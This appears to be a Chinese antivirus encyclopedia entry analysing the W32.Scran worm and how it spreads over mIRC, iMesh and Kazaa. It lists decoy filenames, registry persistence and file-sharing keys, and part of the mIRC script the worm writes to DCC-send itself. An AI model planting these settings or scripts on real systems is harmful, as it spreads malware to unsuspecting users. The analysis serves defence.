概述
病毒別名:處理時間:
威脅級別:★★
中文名稱:渣子
病毒類型:蠕蟲
影響系統:Win9x / WinNT
病毒行為:
這是一個通過mIRC頻道、iMesh和Kazaa檔案共享系統傳播的蠕蟲病毒。該病毒發作的時候將自己的多個副本拷貝到%Program Files%\sys32i目錄下,這些病毒的名字取的都是流行軟體的名字,因此具有很強的欺騙性,用戶很可能誤以為是正常的檔案而去運行,從而導致中毒。病毒通過修改註冊表和mIRC的腳本配置檔案,將病毒與mIRC頻道、iMesh和Kazaa檔案共享系統聯繫起來,使得病毒能夠通過這三個途徑進行傳播。如果系統時間是1月1日,該病毒還會彈出一個如下圖所示的訊息框,此外該病毒還從網上下載病毒到本地機器上運行。1)建立互斥體W32.Scran-Worm,防止病毒的多個實例同時運行。
2)從網路上下載病毒到c:\botnet.exe
3)在%Program Files%\sys32i目錄下建立病毒的多個副本:
Scran.exe
Scran.cpl
Resident Evil.exe
Tomb Raider.exe
Hotmail Hack.exe
Yahoo Hack.exe
Partition Magic 8.exe
Norton Anti Virus Crack.exe
Norton Anti Virus 2004.exe
Norton Anti Virus 2005.exe
Norton Firewall.exe
CD Key.exe
KeyGen.exe
Trojan Remover.exe
Counter Strike.exe
Counter Strike 6.exe
Half-Life.exe
Age of Empires crack.exe
Age of Empires.exe
Hotmail account cracker.exe
Microsoft office.exe
Norton Internet Security 2004.exe
ZoneAlarm Firewall Pro.exe
Windows XP Home.exe
Playstation 2.exe
Grand Theft Auto 3 CD2 ISO.exe
4)添加啟動項:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"W32.Scran"="%Program Files%\sys32i\Scran.exe"
5)在註冊表子鍵
HKEY_CURRENT_USER\Software\Imesh\Client\LocalContent
下添加鍵值
"Dir0"="012345:%Program Files%\sys32i\"
將%Program Files%\sys32i設定為iMesh的默認傳輸路徑
在註冊表子鍵
HKEY_CURRENT_USER\Software\Kazaa\Transfer
下添加鍵值
"DlDir0" = "%Program Files%\sys32i"
和
在註冊表子鍵
HKEY_CURRENT_USER\Software\Kazaa\LocalContent
下添加鍵值
"Dir0"="012345:%Program Files%\sys32i\"
將%Program Files%\sys32i設定為Kazaa的默認傳輸路徑
6)向%Program Files%\mIRC\script.ini中寫入以下腳本,通過mIRC傳播病毒:
【script】
n0= on 1:JOIN:#:{
n1= /if ( $nick == $me )
n2= /.dcc send $nick %Program Files%\sys32i\Scran.cpl